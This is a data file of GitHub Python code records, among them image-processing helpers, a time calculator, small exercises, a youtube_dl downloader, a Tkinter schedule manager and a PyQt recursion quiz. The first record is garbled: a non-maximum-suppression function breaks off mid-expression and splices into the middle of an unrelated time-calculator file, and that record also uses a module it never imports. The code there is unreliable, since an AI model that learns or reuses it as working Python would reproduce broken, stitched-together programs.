+{"seq_id":"75069214170","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 08 10:15:52 2016\n\n@author: yimeng\n\"\"\"\n\nimport math, os, cv2, shutil\nimport numpy as np\n\ndef dp(InputCost):\n # dynamic programming \n\n weight_smooth = 2\n edge = np.ones(InputCost.shape[1])\n paths = np.ones(InputCost.shape[0]) \n backtracing = np.ones(InputCost.shape)\n CAM = copy.deepcopy(InputCost) # cost accumulate matrix\n \n for i in range(1, InputCost.shape[1]):\n for j in range(InputCost.shape[0]):\n for k in range(InputCost.shape[0]):\n paths[k] = weight_smooth*np.absolute(j-k) + CAM[k, i-1] + CAM[j, i]\n \n CAM[j,i] = paths.min() \n backtracing[j,i] = paths.argmin()\n \n edge[-1] = CAM[:,-1].argmin()\n \n for i in range(InputCost.shape[1]-2, -1, -1):\n edge[i] = backtracing[int(edge[i+1]), i+1]\n \n return edge\n \ndef openning(inputmatrix, wind_size = (3,3)):\n # mathematical morphology: openning\n \n kernel = np.ones(wind_size, np.uint8)\n erosion = cv2.erode(inputmatrix, kernel)\n dilation = cv2.dilate(erosion, kernel)\n return dilation\n \ndef closing(inputmatrix, wind_size = (3,3)):\n # mathematical morphology: closing\n \n kernel = np.ones(wind_size, np.uint8)\n dilation = cv2.dilate(inputmatrix, kernel)\n erosion = cv2.erode(dilation, kernel)\n return erosion\n \ndef normalize_std(data):\n # standard normalize\n data_mean = data.mean(axis = 0)\n data_std = data.std(axis = 0) \n data_std[data_std == 0] = 1 \n return (data - data_mean)/data_std, data_mean, data_std \n \ndef relativeDistance(inputdata):\n temp_data = np.vstack((inputdata[0], inputdata[1]))\n\n dist = 0\n for i in range(len(inputdata[0])):\n for j in range(len(inputdata[0])):\n if i!= j:\n dist += np.sqrt((temp_data[0,i] - temp_data[0,j])**2 + (temp_data[1,i] - temp_data[1,j])**2)\n \n return dist\n \ndef zeropadding(matrix, padsize1, padsize2, constant_val = 0):\n leftPad,rightPad,topPad,bottomPad = padsize1, padsize1, padsize2, padsize2\n pads = ((leftPad,rightPad),(topPad,bottomPad))\n return np.pad(matrix, pads, 'constant', constant_values = constant_val)\n\ndef NonMaximumSuppression(labelmap,scoremap,suppresssize):\n finallabel = np.zeros((0,4))\n mapshape = np.array([scoremap.shape[0:2]])\n while (scoremap>0).any():\n index = scoremap.argmax()\n index = np.array([index/mapshape[0,1],index%mapshape[0,1]])\n singlelabel = np.array([[labelmap[index[0],index[1]],scoremap[index[0],index[1]],index[0],index[1]]])\n finallabel = np.concatenate((finallabel,singlelabel),0)\n suppressedLoc = np.array([0,0,mapshape[0,0],mapshape[0,1]])\n if index[0]-suppresssize>0:\n suppressedLoc[0] = index[0]-suppresssize\n if index[0]+suppresssize0:\n suppressedLoc[1] = index[1]-suppresssize\n if index[1]+suppresssize 60:\n add_hr += (min_24hr + duration_minutes_org)//60\n duration_hour = duration_hour_org + add_hr\n duration_minutes = (min_24hr + duration_minutes_org) - (add_hr*60)\n else:\n duration_hour = duration_hour_org\n duration_minutes = duration_minutes_org\n \n if (hour_24hr + duration_hour) > 24:\n cal_nextday += (hour_24hr + duration_hour)//24\n \n #Calculate display day of week\n if str(dayofwk).capitalize() in dayofweek:\n next_day = \"\"\n cal_dow = None\n\n if cal_nextday == 0:\n str_nextday = \", \" + str(dayofwk.capitalize())\n else:\n if (dayofweek[str(dayofwk).capitalize()] + cal_nextday) > 7:\n cal_dow = (dayofweek[str(dayofwk).capitalize()] + cal_nextday)%7\n else:\n cal_dow = dayofweek[str(dayofwk).capitalize()] + cal_nextday\n \n next_day = [k for k, v in dayofweek.items() if v == cal_dow][0]\n \n if 
cal_nextday == 1:\n str_nextday = \", \" + next_day + \" (next day)\"\n else:\n str_nextday = \", \" + next_day + \" (\" + str(cal_nextday) +\" days later)\"\n \n #calculate new_time\n cal_time = start_time + timedelta(minutes=duration_minutes_org, hours=duration_hour_org)\n \n #Show output\n if dayofwk == None:\n if cal_nextday == 1:\n new_time = cal_time.time().strftime('%-I:%M %p') + \" (next day)\"\n elif cal_nextday > 1:\n new_time = cal_time.time().strftime('%-I:%M %p') + \" (\" + str(cal_nextday) + \" days later)\"\n else:\n new_time = cal_time.time().strftime('%-I:%M %p')\n else:\n new_time = str(cal_time.time().strftime('%-I:%M %p')) + str_nextday\n\n return new_time","repo_name":"natthayasp/boilerplate-time-calculator-Public","sub_path":"time_calculator.py","file_name":"time_calculator.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
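The record above computes the rollover with manual carry arithmetic and a platform-specific '%-I' format; a portable cross-check built directly on timedelta (the add_time name and lstrip-based formatting are illustrative, not from the file):

from datetime import datetime, timedelta

def add_time(start, hours, minutes):
    # Parse a 12-hour clock string, add the duration, count day rollovers.
    t = datetime.strptime(start, "%I:%M %p")
    t2 = t + timedelta(hours=hours, minutes=minutes)
    days = (t2.date() - t.date()).days
    suffix = "" if days == 0 else (" (next day)" if days == 1 else " ({} days later)".format(days))
    return t2.strftime("%I:%M %p").lstrip("0") + suffix

print(add_time("11:30 PM", 2, 45))  # 2:15 AM (next day)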
+{"seq_id":"20003935431","text":"def fib(x):\n a=x[0]\n b=x[1]\n for i in range(2,len(x)):\n if x[i]==(a+b):\n a=b\n b=x[i]\n else:\n return False\n return True\n\nn=int(input())\nx=list(map(int,input().split()))\nif len(x)<=2:\n print('no')\nelif fib(x):\n print('yes')\nelse:\n print('no')","repo_name":"Shavukarusasikumar/codemind-python","sub_path":"Fibonacci_array.py","file_name":"Fibonacci_array.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"34601607969","text":"#!/usr/bin/env python\nimport re\n\narr = [1, 4, 8, 9, 7, 5]\n\ndef e_arr():\n for i, v in enumerate(arr):\n yield (i, v)\n\nfor i, v in e_arr():\n print(i, v)\n\nmatch = re.search('(?P.*)\\s+(?P.*)', 'paul 12345')\nname = match.group('name')\nphone = match.group('phone')\nprint(name, phone)\n\nm = re.findall('H', 'hHhHH')\nprint(len(m))\n","repo_name":"allred/allred","sub_path":"sketch/sketch.py","file_name":"sketch.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20433189483","text":"from __future__ import unicode_literals\nimport os\nimport os.path\n\nimport youtube_dl\n\nclass DownloaderAPI():\n DOWNLOAD_LOCATION = 'downloads/'\n available_videos = { }\n\n def __init__(self):\n self.ydl_opts = { # options for youtube_dl\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n 'outtmpl': self.DOWNLOAD_LOCATION + '%(id)s.%(ext)s'\n }\n\n # initiliaze the ydlObject\n self.ydl = youtube_dl.YoutubeDL(self.ydl_opts)\n self._populate_entries()\n\n def is_url_valid(self, url):\n try:\n # Get information about the YouTube video/song\n info = self.ydl.extract_info(url, download=False)\n return info['id']\n except:\n # The url does not exists or is wrong!\n return None\n\n def download(self, videoId, url):\n if videoId not in self.available_videos:\n try:\n self.ydl.download([url])\n except: # something went wrong at downloading process!\n raise\n\n filepath = os.path.join( self.DOWNLOAD_LOCATION, videoId + '.mp3' )\n self.available_videos[videoId] = filepath\n\n print(f'Saved video \"{videoId}\" @ \"{filepath}\"')\n else:\n print(f'Video \"{videoId}\" already downloaded!')\n\n def get_filepath(self, videoId):\n return self.available_videos[videoId]\n\n def _populate_entries(self):\n entries = { }\n for p in os.scandir(self.DOWNLOAD_LOCATION):\n if p.is_file():\n videoId = p.name.split('.')[0]\n entries[videoId] = os.path.realpath(p.path)\n\n self.available_videos = entries\n","repo_name":"kkanellis/genrec","sub_path":"web/server/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"14449429926","text":"#!/bin/python3\n\nimport sys\n\n\ndef arithmetic_progression_sum(a0, an, n):\n return (a0 + an) * n >> 1\n\n\ndef calc_sum(maximum, d):\n a0 = d\n\n if d > maximum:\n return 0\n n = maximum // d\n an = n * d\n\n if an == maximum:\n an -= d\n n -= 1\n\n return arithmetic_progression_sum(a0, an, n)\n\n\ndef calc_sum_slow(maximum, d):\n a = 0\n for x in range(d, maximum, d):\n a += x\n return a\n\n\ndef calc_sum_multiples_3_5(n):\n s1 = calc_sum(n, 3)\n s2 = calc_sum(n, 5)\n s3 = calc_sum(n, 15)\n return int(s1 + s2 - s3)\n\n\ndef main():\n t = int(input().strip())\n for a0 in range(t):\n n = int(input().strip())\n print(calc_sum_multiples_3_5(n))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mastergreg/hackerrank","sub_path":"eulerchallenge/euler_001.py","file_name":"euler_001.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"19626751790","text":"__author__ = \"alvaro barbeira\"\n\nimport re\nimport os\nimport pandas\n\nr_ = re.compile(\"(.*)_chr([0-9]+)_sb([0-9]+)_reg0.1_ff0.01_by_region.txt.gz\")\nr2_ = re.compile(\"gwas_parsing_(.*)_chr([0-9]+)_sb([0-9]+)_by_region.sh\")\n\n\ndef _r(path, r):\n files = os.listdir(path)\n results = []\n for f in files:\n s = r.search(f)\n results.append((s.group(1), s.group(2), s.group(3)))\n return results\n\ndef _p(results):\n results = pandas.DataFrame(data=results,columns= [\"trait\", \"chromosome\", \"sb\"])\n results[\"k\"] = results.chromosome + \"_\" + results.sb\n g = results[[\"trait\", \"k\"]].groupby(\"trait\").aggregate([\"count\"])\n g= g.reset_index(level=\"trait\", col_level=1)\n g.columns = g.columns.droplevel()\n g = g.sort_values(by=\"count\")\n return g\n\nresults = _r(\"results_summary_imputation\", r_)\nresults = _p(results)\n\njobs = _r(\"old/jobs_summary_imputation/\", r2_)\njobs = _p(jobs)\n#from import embed; embed()","repo_name":"hakyimlab/gtex-miscellaneous-processing","sub_path":"src/misc/_check.py","file_name":"_check.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
+{"seq_id":"2941370429","text":"from tkinter import *\nimport tkinter.ttk as tk\nimport json\n\nBLACK = \"#1C2626\"\nWHITE = \"#FFFFFF\"\nRED = \"#FF0000\"\nPURPLE = \"#552D96\"\nGREEN = \"#00FF00\"\nGRAY = \"#C4C4C4\"\nFONT = \"Poppins\"\n\nclass ManageClass:\n def __init__(self, main_window):\n self.main_window = main_window\n self.search_text = StringVar()\n self.class_text = StringVar()\n self.course_text = StringVar()\n self.lec_text = StringVar()\n self.time_text = StringVar()\n self.search = \"\"\n self.class_name = \"\"\n self.course_name = \"\"\n self.lec_name = \"\"\n self.time_stamp = \"\"\n \n with open(\"../data/class_student.json\", mode=\"r\") as file:\n self.class_dict = json.load(file)\n\n # -------------------------------------------- add class function -------------------------------------------- #\n def callback_add_class(self, *args):\n self.class_name = str(self.class_text.get())\n self.course_name = str(self.course_text.get())\n self.lec_name = str(self.lec_text.get())\n self.time_stamp = str(self.time_text.get())\n\n def vcmd_add_class(self):\n self.class_text.trace_add(\"write\", callback=self.callback_add_class)\n self.course_text.trace_add(\"write\", callback=self.callback_add_class)\n self.lec_text.trace_add(\"write\", callback=self.callback_add_class)\n self.time_text.trace_add(\"write\", callback=self.callback_add_class)\n\n def add_new_schedule(self, *event):\n if len(self.class_name)<=0 or len(self.course_name)<=0 or len(self.lec_name)<=0 or len(self.time_stamp)<=0:\n self.indicator_label.configure(text=\"Please Enter the Field!\", fg=RED)\n return self.add_frame.after(1000, func=self.add_class_schedule)\n\n key_checker = [key for key in self.class_dict]\n if self.class_name in key_checker:\n self.indicator_label.configure(text=\"Class Already Exists!\", fg=RED)\n return self.add_frame.after(1000, func=self.add_class_schedule)\n \n data = {\n \"Subject\": str(self.course_name),\n \"StudentNIM\": [],\n \"Lecturer\": str(self.lec_name),\n \"Time\": str(self.time_stamp),\n \"Session\":{}\n }\n self.class_dict[f\"{self.class_name}\"] = data\n\n with open(\"../data/class_student.json\", mode=\"w\") as file:\n file.write(str(json.dumps(self.class_dict, indent=4, sort_keys=True)))\n\n self.indicator_label.configure(text=\"Class Added!\", fg=GREEN)\n self.add_frame.after(1000, func=self.manage_class)\n\n # -------------------------------------------- add class ui -------------------------------------------- #\n def add_class_schedule(self):\n # --------------- reset page\n for widget in self.main_window.winfo_children():\n widget.destroy()\n\n with open(\"../data/class_student.json\", mode=\"r\") as file:\n self.class_dict = json.load(file)\n \n self.add_frame = Frame(self.main_window, bg=BLACK)\n self.add_frame.grid(column=0, row=0)\n\n # --------------- label add schedule\n add_schedule_label = Label(self.add_frame, text=\"ADD CLASS SCHEDULE\", fg=WHITE, bg=BLACK, font=(FONT, 35, \"bold\"))\n add_schedule_label.grid(column=0, row=0, columnspan=3, pady=(0, 20))\n\n # --------------- class name label and entry\n class_name_label = Label(self.add_frame, text=\"Class Name\", fg=WHITE, bg=BLACK, font=(FONT, 12))\n class_name_label.grid(column=1, row=1, sticky=\"W\")\n\n class_entry = Entry(self.add_frame, textvariable=self.class_text, width=35, validate=\"focusin\", validatecommand=self.vcmd_add_class)\n class_entry.configure(background=BLACK, fg=WHITE, font=(FONT, 16))\n self.class_text.set(\"\")\n class_entry.grid(column=1, row=2, pady=(0, 10), sticky=\"W\")\n\n # 
--------------- course name label and entry\n course_name_label = Label(self.add_frame, text=\"Course Name\", fg=WHITE, bg=BLACK, font=(FONT, 12))\n course_name_label.grid(column=1, row=3, sticky=\"W\")\n\n course_name_entry = Entry(self.add_frame, textvariable=self.course_text, width=35, validate=\"focusin\", validatecommand=self.vcmd_add_class)\n course_name_entry.configure(background=BLACK, fg=WHITE, font=(FONT, 16))\n self.course_text.set(\"\")\n course_name_entry.grid(column=1, row=4, pady=(0, 10), sticky=\"W\")\n\n # --------------- lecturer name label and entry\n lec_name_label = Label(self.add_frame, text=\"Lecturer\", fg=WHITE, bg=BLACK, font=(FONT, 12))\n lec_name_label.grid(column=1, row=5, sticky=\"W\")\n\n lec_name_entry = Entry(self.add_frame, textvariable=self.lec_text, width=35, validate=\"focusin\", validatecommand=self.vcmd_add_class)\n lec_name_entry.configure(background=BLACK, fg=WHITE, font=(FONT, 16))\n self.lec_text.set(\"\")\n lec_name_entry.grid(column=1, row=6, pady=(0, 10), sticky=\"W\")\n\n # --------------- time label and entry\n time_label = Label(self.add_frame, text=\"Time\", fg=WHITE, bg=BLACK, font=(FONT, 12))\n time_label.grid(column=1, row=7, sticky=\"W\")\n\n time_entry = Entry(self.add_frame, textvariable=self.time_text, width=35, validate=\"focusin\", validatecommand=self.vcmd_add_class)\n time_entry.configure(background=BLACK, fg=WHITE, font=(FONT, 16))\n self.time_text.set(\"\")\n time_entry.grid(column=1, row=8, pady=(0, 10), sticky=\"W\")\n\n # --------------- indicator label\n self.indicator_label = Label(self.add_frame, text=\"\", fg=GREEN, bg=BLACK, font=(FONT, 12, \"bold\"))\n self.indicator_label.grid(column=1, row=9, pady=(50, 50))\n\n # --------------- cancel button\n cancel_button = Button(self.add_frame, text=\"Cancel\", command=self.manage_class, width=14, height=1)\n cancel_button.configure(background=BLACK, fg=WHITE, font=(FONT, 12, \"bold\"))\n cancel_button.grid(column=0, row=10, sticky=\"E\")\n\n # --------------- add new button\n add_new_button = Button(self.add_frame, text=\"Add New\", command=self.add_new_schedule, width=14, height=1)\n add_new_button.configure(background=PURPLE, fg=WHITE, font=(FONT, 12, \"bold\"))\n add_new_button.grid(column=2, row=10, sticky=\"W\")\n\n # --------------- add new enter\n self.main_window.bind(\"\", self.add_new_schedule)\n\n # -------------------------------------------- manage class function -------------------------------------------- #\n def callback_manage_class(self, *args):\n self.search = str(self.search_text.get())\n\n def vcmd_manage_class(self):\n self.search_text.trace_add(\"write\", callback=self.callback_manage_class)\n\n def click_search(self, *args):\n if str(self.search_text.get()) == \"Search...\":\n self.search_text.set(\"\")\n\n def leave_search(self, *args):\n if str(self.search_text.get()) == \"\":\n self.search_text.set(\"Search...\")\n\n def to_menu(self):\n from menu import Menu\n menu_page = Menu(self.main_window)\n menu_page.menu_page()\n\n def class_info(self, *event):\n try:\n select = self.schedule_table.focus()\n class_code = dict(self.schedule_table.item(select))\n class_code = class_code[\"values\"][0]\n\n from view_class_info import ViewClassInfo\n vci = ViewClassInfo(self.main_window, class_code)\n vci.view_class_info()\n except:\n return\n\n # -------------------------------------------- search class ui -------------------------------------------- #\n def search_class(self, *event):\n query = str(self.search)\n selections = []\n for child in 
self.schedule_table.get_children():\n item = self.schedule_table.item(child)[\"values\"]\n if query.lower() in item[0].lower() or query.lower() in item[1].lower() or query.lower() in item[2].lower():\n selections.append(child)\n\n self.schedule_table.selection_set(selections)\n try:\n self.schedule_table.see(str(selections[0]))\n except:\n pass\n\n # -------------------------------------------- manage class ui -------------------------------------------- #\n def manage_class(self):\n # --------------- reset page\n for widget in self.main_window.winfo_children():\n widget.destroy()\n \n manage_class_frame = Frame(self.main_window, bg=BLACK)\n manage_class_frame.grid(column=0, row=0)\n\n manage_class_label = Label(manage_class_frame, text=\"MANAGE CLASS SCHEDULE\", fg=WHITE, bg=BLACK, font=(FONT, 35, \"bold\"))\n manage_class_label.grid(column=0, row=0, padx=50, columnspan=2)\n\n # --------------- search\n search_bar = Entry(manage_class_frame, width=60, validate=\"focusin\", validatecommand=self.vcmd_manage_class, textvariable=self.search_text)\n self.search_text.set(\"Search...\")\n search_bar.bind(\"\", self.click_search)\n search_bar.bind(\"\", self.leave_search)\n search_bar.configure(background=GRAY, fg=BLACK, font=(FONT, 16))\n search_bar.grid(column=0, row=1, padx=10, pady=10, columnspan=2)\n\n self.main_window.bind(\"\", self.search_class)\n\n # --------------- table page\n table_style = tk.Style()\n table_style.configure(\"Treeview\", font=(\"Poppins\", 12), rowheight=30)\n table_style.configure(\"Treeview.Heading\", font=(\"Poppins\", 12, \"bold\"))\n\n scrollbar = Scrollbar(manage_class_frame, orient=\"vertical\")\n scrollbar.grid(column=1, row=2, sticky=\"NSE\", columnspan=2)\n\n self.schedule_table = tk.Treeview(manage_class_frame, yscrollcommand=scrollbar.set)\n self.schedule_table.grid(column=0, row=2, columnspan=2, sticky=\"W\")\n\n scrollbar.config(command=self.schedule_table.yview)\n\n self.schedule_table[\"columns\"] = (\"Class\", \"Course\", \"Time\")\n self.schedule_table.column(\"#0\", width=0, stretch=NO)\n self.schedule_table.column(\"Class\", anchor=CENTER, width=130, stretch=NO)\n self.schedule_table.column(\"Course\", anchor=CENTER, width=300, stretch=NO)\n self.schedule_table.column(\"Time\", anchor=CENTER, width=300, stretch=NO)\n\n self.schedule_table.heading(\"#0\", text=\"\", anchor=CENTER)\n self.schedule_table.heading(\"Class\", text=\"Class\", anchor=CENTER)\n self.schedule_table.heading(\"Course\", text=\"Course\", anchor=CENTER)\n self.schedule_table.heading(\"Time\", text=\"Time\", anchor=CENTER)\n\n self.main_window.bind(\"\", self.class_info)\n\n counter = 0\n for class_code in self.class_dict:\n subject = self.class_dict[class_code][\"Subject\"]\n time_stamp = self.class_dict[class_code][\"Time\"]\n self.schedule_table.insert(parent=\"\", index=\"end\", iid=counter, text=\"\", values=(f\"{class_code}\", f\"{subject}\", f\"{time_stamp}\"))\n counter += 1\n \n if len(self.class_dict) == 0:\n self.schedule_table.insert(parent=\"\", index=\"end\", iid=counter, text=\"\", values=(\"\", \"Please Enter Data to Continue\", \"\"))\n\n # --------------- back button\n back_button = Button(manage_class_frame, text=\"Back\", command=self.to_menu, width=14, height=1)\n back_button.configure(background=BLACK, fg=WHITE, font=(FONT, 12, \"bold\"))\n back_button.grid(column=0, row=3, pady=20, sticky=\"W\")\n\n # --------------- add class button\n add_class_button = Button(manage_class_frame, text=\"Add New\", command=self.add_class_schedule, width=14, height=1)\n 
add_class_button.configure(background=PURPLE, fg=WHITE, font=(FONT, 12, \"bold\"))\n add_class_button.grid(column=1, row=3, pady=20, sticky=\"E\")","repo_name":"jptriciaestella/face_card","sub_path":"ui/manage_class.py","file_name":"manage_class.py","file_ext":"py","file_size_in_byte":11728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
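For reference, add_new_schedule above writes records of the following shape into ../data/class_student.json (the key and values here are made up for illustration):

example = {
    "CS101": {
        "Subject": "Intro to Programming",
        "StudentNIM": [],
        "Lecturer": "Jane Doe",
        "Time": "Mon 09:00",
        "Session": {}
    }
}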
+{"seq_id":"8700768033","text":"#Coding:utf-8\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QLabel, QLineEdit, QPushButton\nfrom PyQt5.QtGui import QFont, QColor\nimport sys\nfrom random import choice\n\n\nclass MW(QMainWindow):\n def __init__(self):\n super().__init__()\n self.setFixedSize(800, 600)\n # то, какие коэфециенты в шаблоне для рекурсии\n # [+-1, т.е. больше числа или меньше, когда есть рекурсия; чему кратно при проверке на рекурсию; чило, относительно которого всё происходит; слогаемое при нерекурсии; коэфициент при n^2 в формуле с рекурсией;\n # 5) коэфициент при n в формуле с рекурсией; слогаемое в формуле с рекурсией; коэфициент при рекурсии; слогаемое в рекурсии]\n self.variables = [1, 1, 10, 0, 0,\n 1, 1, 1, 1]\n # второй исход с рекурсивной формулой\n # [коэфициент при n^2 в формуле с рекурсией; коэфициент при n в формуле с рекурсией; слогаемое в формуле с рекурсией; коэфициент при рекурсии; слогаемое в рекурсии]\n self.variables2 = [0, 1, 1, 1, 1]\n self.whatcall = 10 # от чего вызываем\n self.answer = 0 # ответ на задачу\n # кнопка обновления\n self.updatebtn = QPushButton(self)\n self.updatebtn.clicked.connect(self.update)\n self.updatebtn.resize(50, 50)\n self.updatebtn.move(750, 550)\n self.updatebtn.setFont(QFont('Arial', 12))\n self.updatebtn.setText('ОБН')\n # лабел \"ответ\"\n self.anslab = QLabel(self)\n self.anslab.resize(150, 50)\n self.anslab.move(0, 550)\n self.anslab.setFont(QFont('Arial', 12))\n self.anslab.setText('ОТВЕТ:')\n # поле для ответа\n self.ansedit = QLineEdit(self)\n self.ansedit.resize(300, 50)\n self.ansedit.move(155, 550)\n self.ansedit.setFont(QFont('Arial', 12))\n # правильный ответ/нет лабел\n self.oklab = QLabel(self)\n self.oklab.resize(50, 50)\n self.oklab.move(460, 550)\n self.oklab.setFont(QFont('Arial', 12))\n self.oklab.setText('ДА')\n self.oklab.hide()\n # кнопка для проверки\n self.checkbtn = QPushButton(self)\n self.checkbtn.clicked.connect(self.checkAns)\n self.checkbtn.resize(150, 50)\n self.checkbtn.move(510, 550)\n self.checkbtn.setFont(QFont('Arial', 12))\n self.checkbtn.setText('ПРОВЕРИТЬ')\n # виджеты с условием на экране\n # [условие с =; возврвт с рекурсией; условие без =; возврат без рекурсии]\n self.tasklabs = []\n for i in range(7):\n self.tasklabs.append(QLabel(self))\n self.tasklabs[-1].resize(800, 50)\n self.tasklabs[-1].move(0, i * 55)\n self.tasklabs[-1].setFont(QFont('Ariel', 12))\n self.tasklabs[-1].show()\n \n def update(self):\n '''обновление задачи'''\n self.oklab.hide() # скрытие лабела\n # рандомизация коэфициентов\n self.variables = [choice([-1, 1]), choice([1, 2, 3]), choice(range(1, 25)), choice(range(-5, 5)), choice(range(-5, 5)),\n choice(range(-10, 5)), choice(range(-20, 20)), choice(list(range(-5, 0)) + list(range(1, 5))), choice(range(1, 5))]\n self.variables2 = [choice(range(-5, 5)), choice(range(-10, 5)), choice(range(-20, 20)), choice(list(range(-5, 0)) + list(range(1, 5))), choice(range(1, 5))]\n self.whatcall = choice(range(10, 500)) # рандомизация аргумента\n self.answer = self.getRec(self.whatcall)\n # заполняем лабел 0 (заголовок нерекурсии)\n s = 'При n <= ' + str(self.variables[2]) + ':' # просто строка для промежуточного хранения текста\n if self.variables[0] == -1:\n s = s.replace('<', '>')\n self.tasklabs[0].setText(s)\n # заполняем лабел 1 (формула нерекурсии)\n s = 'F(n) = n '\n if self.variables[3] < 0:\n s = s + '- ' + str(-1 * self.variables[3])\n elif self.variables[3] > 0:\n s = s + '+ ' + str(self.variables[3])\n self.tasklabs[1].setText(s)\n # заполняем лабел 2 
(заголовок рекурсии)\n s = 'При n > ' + str(self.variables[2])\n if self.variables[0] == -1:\n s = s.replace('>', '<')\n if self.variables[1] != 1:\n s = s + ' и кратно ' + str(self.variables[1])\n s = s + ':'\n self.tasklabs[2].setText(s)\n # заполняем лабел 3 (формула рекурсии)\n s = 'F(n) = '\n if self.variables[7] == 1: # перед рекурсией\n s = s + 'F(n )'\n else:\n s = s + str(self.variables[7]) + 'F(n '\n if self.variables[0] == -1: # слогаемое в рекурсии\n s = s + '+ ' + str(self.variables[8]) + ') '\n else:\n s = s + '- ' + str(self.variables[8]) + ') '\n if self.variables[4] == 1: # n^2\n s = s + '+ ' + 'n^2 '\n elif self.variables[4] < 0:\n s = s + str(self.variables[4]) + 'n^2 '\n elif self.variables[4] > 0:\n s = s + '+' + str(self.variables[4]) + 'n^2 '\n if self.variables[5] == 1: # n\n s = s + '+ ' + 'n'\n elif self.variables[5] < 0:\n s = s + str(self.variables[5]) + 'n '\n elif self.variables[5] > 0:\n s = s + '+' + str(self.variables[5]) + 'n '\n if self.variables[6] < 0: # слогаемое\n s = s + str(self.variables[6])\n elif self.variables[6] > 0:\n s = s + '+' + str(self.variables[6])\n self.tasklabs[3].setText(s) # запись на лабел\n # лабелы 4 и 5 (доп строки для кратности)\n if self.variables[1] == 1:\n self.tasklabs[4].setText('Чему равно F(' + str(self.whatcall) + ')?')\n self.tasklabs[5].setText('')\n self.tasklabs[6].setText('')\n else:\n self.tasklabs[4].setText('Иначе:')\n s = 'F(n) = '\n if self.variables2[3] == 1: # перед рекурсией\n s = s + 'F(n )'\n else:\n s = s + str(self.variables2[3]) + 'F(n '\n if self.variables[0] == -1: # слогаемое в рекурсии\n s = s + '+ ' + str(self.variables2[4]) + ') '\n else:\n s = s + '- ' + str(self.variables2[4]) + ') '\n if self.variables2[0] == 1: # n^2\n s = s + '+ ' + 'n^2 '\n elif self.variables2[0] < 0:\n s = s + str(self.variables2[0]) + 'n^2 '\n elif self.variables2[0] > 0:\n s = s + '+' + str(self.variables2[0]) + 'n^2 '\n if self.variables2[1] == 1: # n\n s = s + '+ ' + 'n'\n elif self.variables2[0] < 0:\n s = s + str(self.variables2[0]) + 'n '\n elif self.variables2[0] > 0:\n s = s + '+' + str(self.variables2[0]) + 'n '\n if self.variables2[2] < 0: # слогаемое\n s = s + str(self.variables2[2])\n elif self.variables2[2] > 0:\n s = s + '+' + str(self.variables2[2])\n self.tasklabs[5].setText(s) # запись на лабел\n self.tasklabs[6].setText('Чему равно F(' + str(self.whatcall) + ')?')\n\n \n def getRec(self, whatcall):\n '''возвращает, что должно быть в результате рекурсии'''\n if self.variables[0] == 1 and whatcall <= self.variables[2] or\\\n self.variables[0] == -1 and whatcall >= self.variables[2]: # возвращается не рекурсия\n return whatcall + self.variables[3]\n elif (self.variables[0] == 1 and whatcall > self.variables[2] or\\\n self.variables[0] == -1 and whatcall < self.variables[2]) and whatcall % self.variables[1] == 0: # возвращается рекурсия при кратном\n return self.variables[7] * self.getRec(whatcall - self.variables[0] * self.variables[8]) + self.variables[4] * whatcall ** 2 +\\\n whatcall * self.variables[5] + self.variables[6]\n else: # возврвщает при некратном\n return self.variables2[3] * self.getRec(whatcall - self.variables[0] * self.variables2[4]) + self.variables2[0] * whatcall ** 2 +\\\n whatcall * self.variables2[1] + self.variables[2]\n\n def checkAns(self):\n try:\n ans = int(self.ansedit.text())\n self.oklab.show()\n if ans == self.answer:\n self.oklab.setText('ДА
')\n else:\n self.oklab.setText('НЕТ
')\n except:\n self.oklab.setText('ERR, ')\n print(self.answer)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n mw = MW()\n mw.show()\n sys.exit(app.exec_())\n ","repo_name":"Helegerd/recursia","sub_path":"recursia.py","file_name":"recursia.py","file_ext":"py","file_size_in_byte":9897,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
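With the default, pre-randomization coefficients in self.variables ([1, 1, 10, 0, 0, 1, 1, 1, 1]), the recurrence in getRec collapses to a single-branch form; a standalone sketch for checking values by hand (memoized so repeated calls stay cheap):

from functools import lru_cache

@lru_cache(maxsize=None)
def f(n):
    # Base case from variables[2]=10 and variables[3]=0: F(n) = n for n <= 10.
    if n <= 10:
        return n
    # Recursive case: F(n) = 1*F(n-1) + 0*n**2 + 1*n + 1.
    return f(n - 1) + n + 1

print(f(12))  # f(10)=10, f(11)=22, f(12)=35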
